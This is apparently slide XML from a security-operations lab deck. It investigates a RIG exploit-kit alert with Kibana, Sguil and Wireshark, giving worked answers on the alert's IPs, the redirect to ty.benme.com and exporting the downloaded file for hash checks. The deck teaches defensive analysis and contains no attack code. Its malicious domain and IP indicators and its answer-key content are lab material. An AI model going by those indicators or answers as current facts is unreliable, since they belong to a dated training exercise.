                <a:spcPts val="15400"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="110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6" name="Freeform 16"/>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sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 18"/>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9" name="TextBox 19"/>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13</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11760544" y="2359141"/>
            <a:ext cx="4569056" cy="9410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KIBANA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9906000" y="4762500"/>
            <a:ext cx="9256395" cy="3159760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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After use Kibana get this details</a:t>
            </a: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Look at the expanded alert details</a:t>
            </a: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first detected NIDS alert in Kibana Jan 27, 2017 – 22:54:43</a:t>
            </a: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source IP address in the alert 172.16.4.193</a:t>
            </a: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the destination IP address in the alert 194.87.234.129</a:t>
            </a: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the destination port in thealert 80 service is HTTP</a:t>
            </a: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the classification of the alert trojan activity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3080"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>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the destination geo country name Russia</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Picture 1" descr="kbine3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect t="20370" r="3835" b="6296"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="38735" y="153035"/>
            <a:ext cx="10495280" cy="101339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 y="190500"/>
            <a:ext cx="11153775" cy="8877300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11811000" y="1085215"/>
            <a:ext cx="5870575" cy="984250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="0" algn="l" defTabSz="266700">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:ea typeface="Aptos"/>
              </a:rPr>
              <a:t> Emerging Threats</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:ea typeface="Aptos"/>
              </a:rPr>
              <a:t>!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Box 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11887200" y="2247900"/>
            <a:ext cx="5870575" cy="1421765"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="0" algn="l" defTabSz="266700">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:ea typeface="Aptos"/>
              </a:rPr>
              <a:t>link that is provided in the signature_info field of the alert</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Box 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11782425" y="3848417"/>
            <a:ext cx="5080000" cy="5169535"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="0" defTabSz="266700">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>What is the malware family for this event</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="0" defTabSz="266700">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" b="1" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="00FFFF"/>
                </a:highlight>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
              </a:rPr>
              <a:t>Exploit_Kit_RIG</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="0" defTabSz="266700">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>What is the severity of the exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="0" defTabSz="266700">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="00FFFF"/>
                </a:highlight>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
              </a:rPr>
              <a:t>The signature severity is Major.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="0" defTabSz="266700">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>What is an Exploit Kit? (EK) Search on the internet to </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="0" defTabSz="266700">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" b="1" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="00FFFF"/>
                </a:highlight>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
              </a:rPr>
              <a:t>computer with malware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9" name="Picture 19" descr="screenshot of transcript for the first NIDS ale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65" y="216535"/>
            <a:ext cx="10764520" cy="9892030"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Box 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11658600" y="1104900"/>
            <a:ext cx="5870575" cy="583565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="0" algn="l" defTabSz="266700">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:ea typeface="Aptos"/>
              </a:rPr>
              <a:t>View the Transcript capME!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10820400" y="2933700"/>
            <a:ext cx="6232525" cy="4728845"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="0" algn="l" defTabSz="266700">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:ea typeface="Aptos"/>
              </a:rPr>
              <a:t>website did the user intend to connect to  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" u="sng">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:ea typeface="Helvetica"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>www.homeimprovement.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="0" algn="l" defTabSz="266700">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:ea typeface="Aptos"/>
              </a:rPr>
              <a:t>The URL did the browser refer the user to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:ea typeface="Helvetica"/>
              </a:rPr>
              <a:t>ty.benme.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="0" algn="l" defTabSz="266700">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:ea typeface="Aptos"/>
              </a:rPr>
              <a:t>kind of content is requested by the source host from tybenme.com </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:ea typeface="Helvetica"/>
              </a:rPr>
              <a:t>The content is shown as gzip.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154237" y="3103530"/>
            <a:ext cx="17703160" cy="2951705"/>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What is the Wireshark:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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Function: A network analyzer used to capture and analyze network traffic, helping to trace the scope of the infection and identify 	malicious communication.</a:t>
            </a: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342900" indent="-342900">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Pivoting from SGUIL to WIRESHARK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2940"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	means shifting your analysis to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to investigate network traffic at a deeper level. It involves using Wireshark to capture and 	analyze packets after detecting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>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151043"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INVESTIGATE  USING </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Abadi" panose="020B0604020104020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>WIRESHARK </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Picture 19"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:srcRect l="5263" r="5263"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="12958641" y="5813349"/>
            <a:ext cx="3098923" cy="31106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1" name="TextBox 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219200" y="5901935"/>
            <a:ext cx="5546473" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HOW ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Right click on the record </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  select Wireshark</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="828999" y="7742774"/>
            <a:ext cx="10897290" cy="1836015"/>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rgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Change the format of Time.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="2940"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  To make time and date appears as column in Wireshark using helpful format</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2940"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	HOW?	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2940"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	View &gt; Time Display Format &gt; Date and Time of Day, View &gt; Time Display Format &gt; Seconds</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>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552392" y="1076325"/>
            <a:ext cx="9760909" cy="4598670"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square"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8" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="1935187"/>
            <a:ext cx="6151043"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INVESTIGATE  USING </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Abadi" panose="020B0604020104020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>WIRESHARK </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="552392" y="2345778"/>
            <a:ext cx="10445606" cy="1925079"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2940"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1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342900" indent="-342900">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Investigate HTTP Traffic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2940"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:ea typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:cs typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:sym typeface="Canva Sans" panose="020B0503030501040103"/>
              </a:rPr>
              <a:t>	</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in Wireshark  many of packets exists so , we can use filter box to retrieve 	specific packets.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2940"/>
              </a:lnSpc>
            </a:pP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	firstly, we filter to get http requests by  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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http.request </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for web requests only</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="Picture 24"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:srcRect b="38728"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2266268" y="4457799"/>
            <a:ext cx="14626434" cy="1925079"/>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9" name="Picture 28"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2302127" y="7984541"/>
            <a:ext cx="14626434" cy="21292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TextBox 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1211905" y="6686015"/>
            <a:ext cx="16577663" cy="1181285"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2940"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:ea typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:cs typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:sym typeface="Canva Sans" panose="020B0503030501040103"/>
              </a:rPr>
              <a:t>In the Hypertext Transfer Protocol (HTTP) application layer</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 fields like request type, accept, and host are commonly seen. However, one important field is the Referer, which indicates the website that directed the user to the current page. This field can be critical in identifying when a user is redirected from a legitimate site to a malicious one.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552392" y="1076325"/>
            <a:ext cx="9760909" cy="4598670"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square"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8" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="1935187"/>
            <a:ext cx="6151043"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INVESTIGATE  USING </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Abadi" panose="020B0604020104020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>WIRESHARK </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="552392" y="2345778"/>
            <a:ext cx="16897408" cy="2296975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2940"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1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342900" indent="-342900">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Saving HTTP File</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2940"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:ea typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:cs typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:sym typeface="Canva Sans" panose="020B0503030501040103"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:ea typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:cs typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:sym typeface="Canva Sans" panose="020B0503030501040103"/>
              </a:rPr>
              <a:t>We need to save the HTTP file for analysis, such as generate its hash, and check if it's a malicious file or not using Virus total or other websites.</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	How </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2940"/>
              </a:lnSpc>
            </a:pP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	File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:ea typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:cs typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </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Export Objects </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:ea typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:cs typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </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HTTP.  select the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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remodeling-your-kitchen-cabinets.htm</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l packet and save</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2940"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Canva Sans" panose="020B0503030501040103"/>
              <a:ea typeface="Canva Sans" panose="020B0503030501040103"/>
              <a:cs typeface="Canva Sans" panose="020B0503030501040103"/>
              <a:sym typeface="Canva Sans" panose="020B0503030501040103"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Picture 19"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
